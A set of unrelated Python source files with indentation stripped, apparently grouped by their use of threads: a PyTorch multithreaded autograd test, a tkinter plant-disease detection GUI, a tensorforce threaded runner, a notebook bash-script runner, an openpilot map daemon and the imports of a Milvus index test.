# different threads, and we need to ensure the user specifies retain_graph=True;
# otherwise we error out with the correct error message
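# Schematically (illustrative only):
#   mid = f(x)                            # first half, built once on the main thread
#   each thread: g(mid).sum().backward()  # second half + backward, per thread
# The backward calls share the part of the graph that produced `mid`, so all
# but the first need retain_graph=True.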
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will succeed in this case; all other threads should raise
# an error recommending that the user specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# the accumulated result should equal num_threads * gradient
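# chain rule check: with m = x + x**2 and z = m + m**2,
# dz/dx = (1 + 2*m) * (1 + 2*x) = 4*x**3 + 6*x**2 + 4*x + 1,
# accumulated 5 times (once per thread)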
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from the autograd/ directory here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex # noqa: F401
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
instantiate_parametrized_tests(TestAutograd)
if __name__ == '__main__':
run_tests()
|
gui.py
|
from tkinter import *
from tkinter.ttk import Progressbar
import tkinter.messagebox
from tkinter.ttk import Progressbar, Style, Button
import cv2, os
from tkinter import filedialog
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from PIL import ImageTk, Image
from inference import SurvedModel
mpl.rcParams['figure.dpi'] = 300
import time
from threading import Thread
##################################################
# Declare variables and create class instances
##################################################
model = SurvedModel()
# Details about the paprika plant shown in the drop-down menu
details = 'The Paprika Plant, commonly known as Bell Pepper, is susceptible to many diseases; this program uses a Machine \
Learning algorithm to detect a few of those diseases. A few of them are:\
\n1. Blossom_end_rot\
\n2. Powdery Mildew \
\n3. Cercospora \
\n4. Graymold \
\n5. Spider Mite'
help_msg = 'A Machine Learning algorithm for detecting plant disease by RV Lab.\nHomepage: https://home.jbnu.ac.kr/robotv/index.htm'
##################################################
# Declare the functions used by the GUI
##################################################
def model_loader():
'''Load the model onto the GPU by running a dummy input through it'''
_ = model.predict(np.ones((600,600,3)).astype(np.uint8))
def paprika():
'''Show details about the paprika plant from the drop-down menu'''
tkinter.messagebox.showinfo(title='Paprika Plant', message=details)
def fct():
'''Model loading progress bar'''
for i in range(1, 101):
# the model takes roughly 30 seconds to load onto the GPU => 0.3 s * 100 steps
time.sleep(0.3)
progress.step()
if i != 100:
s.configure("LabeledProgressbar", text="Loading Model on GPU please wait: {0} % ".format(i))
elif i == 100:
s.configure("LabeledProgressbar", text="Done Loading Model")
root.update()
def bar():
'''Make an indeterminate progress bar (not used in this script)'''
steps = [0, 20, 40, 50, 60, 80, 100, 80, 60, 50, 40, 20]
for i in steps:
progress_det['value'] = i
root.update_idletasks()
time.sleep(0.00009)
progress_det['value'] = 0
def increment():
'''The detection progress bar'''
for i in range(100):
progress_det["value"] = i+1
root.update()
time.sleep(0.00009)
def about_us():
'''Show the About Us message from the drop-down menu'''
tkinter.messagebox.showinfo(title='Robot Vision Lab', message = help_msg)
def browse_file():
'''Load an image file for the model via the drop-down menu'''
# to clear frame
for widget in resultframe.winfo_children():
widget.destroy()
global img_path, img, name
img_path = filedialog.askopenfilename()
img = cv2.imread(img_path)
img2 = cv2.resize(img, (640,640))# just so it can fit inside root window
img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)
name = os.path.basename(img_path)
photo2 = ImageTk.PhotoImage(Image.fromarray(img2))
# a Label widget also acts as a container, so we can use it to embed an image
labelphoto2 = Label(resultframe, image = photo2)
labelphoto2.img2 = photo2
labelphoto2.pack(side=LEFT, padx=5)
statusbar['bg'] = 'white'
statusbar['text'] = 'Loaded Image: {}'.format(name)
def play_btn():
'''Command function for when you click "Detect" button '''
try:
print('Running')
op = model.predict(img)
print('Done')
increment()
op = cv2.resize(op, (640,640))
photo3 = ImageTk.PhotoImage(Image.fromarray(op))
labelphoto3 = Label(resultframe, image = photo3)
labelphoto3.img = photo3
labelphoto3.pack(side=RIGHT, padx=5)
statusbar['bg'] = 'green'
statusbar['text'] = 'Done'
except NameError:
tkinter.messagebox.showerror(title='File not found', message='Load an image before running the detection model')
##################################################
# Now start creating window GUI
##################################################
# create the main window and store it in the root variable
root = Tk()
# frame 1 for title
titleframe = Frame(root)
titleframe.pack(padx=10, pady=10)
# isolation frame 1 for ip/op images
resultframe = Frame(root, relief=RAISED, borderwidth=1)# , relief=RAISED, borderwidth=1
resultframe.pack(padx=10, pady=10)
# command frame for detect button and progress bars
commandframe = Frame(root)
commandframe.pack(padx=10, pady=10)
# add title of main root window
root.title('Disease Detector')
# add icon of main root window
root.iconbitmap(r'C:/Users/Talha/Desktop/chkpt/paprika_model/icon.ico')
# increase the size of window so that when script is run it opens a 1500x1500px window
root.geometry('1500x1500')
#*****************************
# create a menubar
menubar = Menu(root)
root.config(menu = menubar)
# create submenu
submenu = Menu(menubar, tearoff = 0)
menubar.add_cascade(label='File', menu=submenu)
submenu.add_command(label='Load Image', command= browse_file)
submenu.add_command(label='About Paprika', command=paprika)
# create submenu 2
submenu2 = Menu(menubar, tearoff = 0)
menubar.add_cascade(label='Help', menu=submenu2)
submenu2.add_command(label='About Us', command = about_us)
submenu2.add_command(label='Exit', command=root.destroy)
#*******************************
# Header Line of the GUI
# add photo
photo = PhotoImage(file='C:/Users/Talha/Desktop/chkpt/paprika_model/rv.png')
# a Label widget also acts as a container, so we can use it to embed an image
labelphoto = Label(titleframe, image = photo)
labelphoto.pack(side=LEFT)
# Label widget
text = Label(titleframe, text='Load Paprika Image for Disease Detection.', fg = "black",bg = "white",font = "Helvetica 16 bold italic")
# now you'll have to pack it inside tkinter window
text.pack(side=LEFT)
#*************************************************************************************************************************
# Initializing progress bars
# progressbar with text inside it
s = Style(root)
# add the label to the progressbar style
s.layout("LabeledProgressbar",
[('LabeledProgressbar.trough',
{'children': [('LabeledProgressbar.pbar',
{'side': 'left', 'sticky': 'ns'}),
("LabeledProgressbar.label", # label inside the bar
{"sticky": ""})],
'sticky': 'nswe'})])
progress = Progressbar(commandframe, orient="horizontal", length=300, style="LabeledProgressbar")
progress.pack(side=TOP, padx=10, pady=10)
# change the text of the progressbar,
# the trailing spaces are here to properly center the text
s.configure("LabeledProgressbar", text="Loading Model on GPU please wait:0 % ")
# uncomment this if you want to make an image button instead of 'Detect' text button
#btnphoto = ImageTk.PhotoImage(Image.open('C:/Users/Talha/Desktop/chkpt/paprika_model/run.png'))
# make detect button
btn = Button(commandframe, text='Detect', command =play_btn)#image = btnphoto,
btn.pack(side=LEFT, padx=10, pady=10)
# 2nd progress bar with detect button
progress_det = Progressbar(commandframe, length=200, cursor='watch',mode="determinate", orient=HORIZONTAL)
#progress_det = Progressbar(commandframe, orient = HORIZONTAL, length = 100, mode = 'indeterminate') # for shuttling block progress bar
progress_det.pack(side=LEFT, padx=10, pady=10)
##################################################
# Start threading because loading the model on the GPU takes time;
# running it in parallel keeps the GUI responsive
##################################################
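# Note: both helper threads are created with daemon=True, so they exit
# automatically when the main Tk window (and hence the main thread) is closed
# and never keep the process alive on their own.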
# Start loading model bar
thread1 = Thread(target=fct, daemon=True)
thread1.start()
print('thread 1 start')
# Now start loading the model on the GPU in parallel
thread2 = Thread(target=model_loader, daemon=True)
thread2.start()
# make a bottom status bar showing the status of the program
statusbar = Label(root, text = 'Welcome to Paprika Disease Detector', relief = SUNKEN, anchor=W)
statusbar.pack(side=BOTTOM, fill=X)
# run the Tk event loop (without this call the window will close immediately)
root.mainloop()
|
threaded_runner.py
|
# Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Runner for non-realtime threaded execution of multiple agents.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import time
import threading
from six.moves import xrange
from tensorforce.agents.agent import Agent
from tensorforce import TensorForceError
class ThreadedRunner(object):
def __init__(self, agents, environments, repeat_actions=1, save_path=None, save_episodes=None):
"""
Initialize a ThreadedRunner object.
Args:
agents: List of `Agent` objects containing the reinforcement learning agents, one per environment.
environments: List of `Environment` objects, one per agent.
repeat_actions: Number of times each chosen action is repeated in the environment.
save_path: Path used to periodically save the first agent's model.
save_episodes: Save the model every this many episodes (requires save_path).
"""
if len(agents) != len(environments):
raise TensorForceError("Each agent must have its own environment. Got {a} agents and {e} environments.".
format(a=len(agents), e=len(environments)))
self.agents = agents
self.environments = environments
self.repeat_actions = repeat_actions
self.save_path = save_path
self.save_episodes = save_episodes
def _run_single(self, thread_id, agent, environment, repeat_actions=1, max_timesteps=-1, episode_finished=None):
"""
The target function for a thread, runs an agent and environment until signaled to stop.
Adds rewards to shared episode rewards list.
Args:
max_timesteps: Max timesteps in a given episode
episode_finished: Optional termination condition, e.g. a particular mean reward threshold
Returns:
"""
episode = 1
while not self.global_should_stop:
state = environment.reset()
agent.reset()
episode_reward = 0
timestep = 0
while True:
action = agent.act(states=state)
if repeat_actions > 1:
reward = 0
for repeat in xrange(repeat_actions):
state, terminal, step_reward = environment.execute(actions=action)
reward += step_reward
if terminal:
break
else:
state, terminal, reward = environment.execute(actions=action)
agent.observe(reward=reward, terminal=terminal)
timestep += 1
self.global_step += 1
episode_reward += reward
if terminal or timestep == max_timesteps:
break
if self.global_should_stop:
return
#agent.observe_episode_reward(episode_reward)
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(timestep)
summary_data = {
"thread_id": thread_id,
"episode": episode,
"timestep": timestep,
"episode_reward": episode_reward
}
if episode_finished and not episode_finished(summary_data):
return
episode += 1
self.global_episode += 1
def run(self, episodes=-1, max_timesteps=-1, episode_finished=None, summary_report=None, summary_interval=0):
# Save episode reward and length for statistics.
self.episode_rewards = []
self.episode_lengths = []
self.global_step = 0
self.global_episode = 1
self.global_should_stop = False
# Create threads
threads = [threading.Thread(target=self._run_single, args=(t, self.agents[t], self.environments[t],),
kwargs={"repeat_actions": self.repeat_actions,
"max_timesteps": max_timesteps,
"episode_finished": episode_finished})
for t in range(len(self.agents))]
# Start threads
self.start_time = time.time()
[t.start() for t in threads]
try:
next_summary = 0
next_save = 0
while self.global_episode < episodes or episodes == -1:
if self.global_episode > next_summary:
summary_report(self)
next_summary += summary_interval
if self.save_path and self.save_episodes is not None and self.global_episode > next_save:
print("Saving agent after episode {}".format(self.global_episode))
self.agents[0].save_model(self.save_path)
next_save += self.save_episodes
time.sleep(1)
except KeyboardInterrupt:
print('Keyboard interrupt, sending stop command to threads')
self.global_should_stop = True
# Join threads
[t.join() for t in threads]
print('All threads stopped')
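# Hedged usage sketch (the agent/environment lists and the summary callback
# below are hypothetical, not defined in this module):
#   runner = ThreadedRunner(my_agents, my_environments, repeat_actions=1)
#   runner.run(episodes=1000, summary_report=lambda r: print(r.global_episode),
#              summary_interval=100)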
def WorkerAgentGenerator(agent_class):
"""
Worker Agent generator: receives an Agent class and creates a WorkerAgent class that inherits from that Agent.
"""
class WorkerAgent(agent_class):
"""
Worker agent receiving a shared model to avoid creating multiple models.
"""
def __init__(self, states_spec, actions_spec, network_spec, model=None, **kwargs):
self.network_spec = network_spec
self.model = model
super(WorkerAgent, self).__init__(
states_spec,
actions_spec,
network_spec,
**kwargs
)
def initialize_model(self, states_spec, actions_spec):
return self.model
return WorkerAgent
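# Hedged example of how WorkerAgentGenerator might be used (PPOAgent and the
# spec/model variables here are assumptions, not defined in this module):
#   WorkerPPO = WorkerAgentGenerator(PPOAgent)
#   worker = WorkerPPO(states_spec, actions_spec, network_spec, model=shared_model)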
|
runner.py
|
from IPython.display import display
import ipywidgets as widgets
import subprocess
import argparse
import sys
import time
import threading
from .logview import LogView
from .logfile import LogFile
def run_script(script):
"""
Run script via Python API.
It is an internal testing API.
"""
runner = Runner("")
runner.run(script)
class RunScriptProxy:
def __init__(self):
self.mutex = threading.Lock()
self.is_finished = False
self.error = None
self.messages = []
def acquire(self):
self.mutex.acquire()
def release(self):
self.mutex.release()
def execute_script_in_thread(script):
def worker(proxy, script):
try:
process = subprocess.Popen(script,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
universal_newlines=True,
executable='/bin/bash')
for line in process.stdout:
proxy.acquire()
proxy.messages.append(line)
proxy.release()
except Exception as e:
proxy.acquire()
proxy.error = e
proxy.release()
proxy.acquire()
if process.wait() != 0:
proxy.error = Exception("Failed!")
proxy.is_finished = True
proxy.release()
proxy = RunScriptProxy()
thread = threading.Thread(target=worker, args=(proxy, script))
thread.start()
return proxy
def run_chain(funcs):
if len(funcs) == 0:
return
remaining = funcs[1:]
func = funcs[0]
def next():
run_chain(remaining)
func(next)
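# Illustration of the chaining protocol used by Runner below: each step receives
# a `next` callback and only continues the chain by calling it (the steps shown
# are hypothetical):
#   run_chain([
#       lambda next: (print("step 1"), next()),
#       lambda next: (print("step 2"), next()),
#   ])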
class Runner:
def __init__(self, args):
parser = argparse.ArgumentParser(prog="livebash", add_help=False)
parser.add_argument('-h', '--help',
action='store_true', dest='print_help')
parser.add_argument('--save',
dest='output_file', type=str, help="Save output to a file")
parser.add_argument('--save-timestamp',
action='store_true', dest='use_timestamp',
help="Add timestamp to the output file name")
parser.add_argument('--line-limit',
dest='line_limit', default=0, type=int,
help="Restrict the no. of lines to be shown")
parser.add_argument('--height',
dest='height', default=0, type=int,
help="Set the height of the output cell (no. of line)")
parser.add_argument('--ask-confirm',
action='store_true', dest='ask_confirm',
help="Ask for confirmation before execution")
parser.add_argument('--notify',
action='store_true', dest='send_notification',
help="Send a notification when the script finished")
parser.add_argument('--keep-cell-output',
action='store_true', dest='keep_cell_output',
help="Keep the cell output")
self.args = parser.parse_args(args)
self.parser = parser
self.log_view = LogView()
self.line_printed = 0
self.is_executed = False
if self.args.output_file is not None:
self.log_file = LogFile(
pattern=self.args.output_file,
use_timestamp=self.args.use_timestamp
)
self.log_view.height = self.args.height
self.container = widgets.VBox(
[self.log_view]
)
self.grid_box = widgets.GridBox(
children=[self.container],
layout=widgets.Layout(
width="100%",
grid_template_rows='auto',
grid_template_columns='100%'
)
)
def run(self, script):
display(self.grid_box)
funcs = [
lambda next: self.execute_confirmation(next),
lambda next: self.execute_notification(next),
lambda next: self.execute_logger(next),
lambda next: self.execute_script(script, next)
]
run_chain(funcs)
def execute_confirmation(self, next):
if self.args.ask_confirm is not True:
next()
return
confirm_button = widgets.Button(description="Confirm")
cancel_button = widgets.Button(description="Cancel")
output = widgets.Output()
hbox = widgets.HBox([confirm_button, cancel_button])
def confirm(_):
hbox.layout.display = 'none'
output.layout.display = 'none'
next()
def cancel(_):
hbox.layout.display = 'none'
with output:
print("")
print("Canceled")
confirm_button.on_click(confirm)
cancel_button.on_click(cancel)
self.container.children = [output, hbox] + \
list(self.container.children)
with output:
print("Are you sure you want to run this script?")
def flush(self):
self.log_view.flush()
if self.args.output_file is not None:
self.log_file.flush()
def write_message(self, line):
self.line_printed = self.line_printed + 1
if self.args.output_file is not None:
self.log_file.write_message(line)
if self.args.keep_cell_output is True:
sys.stdout.write(line)
return
if (self.line_printed >= self.args.line_limit and
self.args.line_limit > 0):
if self.log_view.status_header == "":
self.log_view.status_header = "=== Output exceeds the line limit. Only the latest output will be shown ===" # noqa
self.log_view.write_status(line)
else:
self.log_view.write_message(line)
def execute_script(self, script, next):
if self.is_executed:
return
self.is_executed = True
self.log_view.running = True
try:
proxy = execute_script_in_thread(script)
while True:
time.sleep(0.1)
proxy.acquire()
messages = proxy.messages
is_finished = proxy.is_finished
error = proxy.error
proxy.messages = []
proxy.release()
if len(messages) > 0:
for message in messages:
self.write_message(message)
self.flush()
if is_finished or error is not None:
break
except Exception as e:
error = e
self.log_view.flush()
self.log_view.running = False
if error is not None:
raise error
next()
def execute_notification(self, next):
if self.args.send_notification is False:
next()
return
def callback(permission):
if permission != "granted":
self.log_view.write_message(
f"Request notification permission failed: {permission}")
return
next()
self.log_view.notification_message = "The script is finished"
self.log_view.request_notification_permission(callback)
def execute_logger(self, next):
if self.args.output_file is not None:
self.log_file.open()
next()
self.log_file.close()
else:
next()
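# Hedged usage sketch (this class is normally driven from a notebook cell magic;
# the argument list and script string below are illustrative only):
#   Runner(["--line-limit", "50"]).run("echo hello && sleep 1")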
|
mapd.py
|
#!/usr/bin/env python3
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from scipy import spatial
#DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
#from selfdrive.mapd import default_speeds_generator
#default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import time
import zmq
import requests
import threading
import numpy as np
import overpy
#from common.params import Params
from collections import defaultdict
from common.transformations.coordinates import geodetic2ecef
import selfdrive.mapd.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
OVERPASS_API_URL = "https://z.overpass-api.de/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def connected_to_internet(url='https://z.overpass-api.de/api/interpreter', timeout=5):
try:
requests.get(url, timeout=timeout)
return True
except (requests.ReadTimeout, requests.ConnectionError):
print("No internet connection available.")
return False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
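# Hedged usage sketch (coordinates are illustrative):
#   q = build_way_query(37.7749, -122.4194, radius=4000)
#   result = overpy.Overpass(url=OVERPASS_API_URL).query(q)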
def query_thread():
global last_query_result, last_query_pos, cache_valid
#api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=20.)
api = overpy.Overpass(url=OVERPASS_API_URL)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 3000: # skip re-querying until we are within 1 km of the edge of the downloaded 4 km circle
continue
if dist > 4000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=4000)
if connected_to_internet():
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
else:
query_lock.acquire()
last_query_result = None
query_lock.release()
def save_gps_data(gps):
try:
location = [gps.speed, gps.bearing, gps.latitude, gps.longitude, gps.altitude, gps.accuracy, time.time()]
with open("/data/openpilot/selfdrive/data_collection/gps-data", "a") as f:
f.write("{}\n".format(location))
except:
pass
def mapsd_thread():
global last_gps
context = zmq.Context()
poller = zmq.Poller()
gps_external_sock = messaging.sub_sock(context, 8032, poller, conflate=True)
map_data_sock = messaging.pub_sock(context, 8065)
traffic_data_sock = messaging.sub_sock(context, 8208, poller, conflate=True)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
speedLimittraffic = 0
speedLimittraffic_prev = 0
max_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
max_speed_prev = 0
speedLimittrafficvalid = False
while True:
gps_ext = None
traffic = None
for socket, event in poller.poll(0):
if socket is gps_external_sock:
gps_ext = messaging.recv_one(socket)
elif socket is traffic_data_sock:
traffic = messaging.recv_one_arne182(socket)
if traffic is not None:
if traffic.liveTrafficData.speedLimitValid:
speedLimittraffic = traffic.liveTrafficData.speedLimit
if abs(speedLimittraffic_prev - speedLimittraffic) > 0.1:
speedLimittrafficvalid = True
speedLimittraffic_prev = speedLimittraffic
if traffic.liveTrafficData.speedAdvisoryValid:
speedLimittrafficAdvisory = traffic.liveTrafficData.speedAdvisory
speedLimittrafficAdvisoryvalid = True
else:
speedLimittrafficAdvisoryvalid = False
else:
speedLimittrafficAdvisoryvalid = False
speedLimittrafficvalid = False
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
continue
save_gps_data(gps)
last_gps = gps
fix_ok = gps.flags & 1
if gps.accuracy > 2.0:
fix_ok = False
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
max_speed_ahead = None
max_speed_ahead_dist = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
if pnts is not None:
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 5:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
else:
curvature_valid = False
upcoming_curvature = 0.
curvature = None
dist_to_turn = 0.
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 15.] = np.inf
try:
if cur_way.way.tags['highway'] == 'trunk':
radii = radii*1.6 # https://media.springernature.com/lw785/springer-static/image/chp%3A10.1007%2F978-3-658-01689-0_21/MediaObjects/298553_35_De_21_Fig65_HTML.gif
if cur_way.way.tags['highway'] == 'motorway' or cur_way.way.tags['highway'] == 'motorway_link':
radii = radii*2.8
except KeyError:
pass
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
upcoming_curvature = np.amax(curvature)
dist_to_turn = np.amin(dists[np.logical_and(curvature >= np.amax(curvature), curvature <= np.amax(curvature))])
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed(heading)
max_speed_ahead = None
max_speed_ahead_dist = None
if max_speed is not None:
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
else:
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(speed*1.1, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
# TODO: anticipate T junctions and right and left hand turns based on indicator
if max_speed_ahead is not None and max_speed_ahead_dist is not None:
dat.liveMapData.speedLimitAheadValid = True
dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
if max_speed is not None:
if abs(max_speed - max_speed_prev) > 0.1:
speedLimittrafficvalid = False
max_speed_prev = max_speed
advisory_max_speed = cur_way.advisory_max_speed()
if speedLimittrafficAdvisoryvalid:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = speedLimittrafficAdvisory / 3.6
else:
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
if speedLimittrafficvalid:
if speedLimittraffic > 0.1:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = speedLimittraffic / 3.6
map_valid = False
else:
speedLimittrafficvalid = False
else:
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
test_index.py
|
import logging
import time
import pdb
import copy
import threading
from multiprocessing import Pool, Process
import numpy
import pytest
import sklearn.preprocessing
from utils.utils import *
from common.constants import *
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
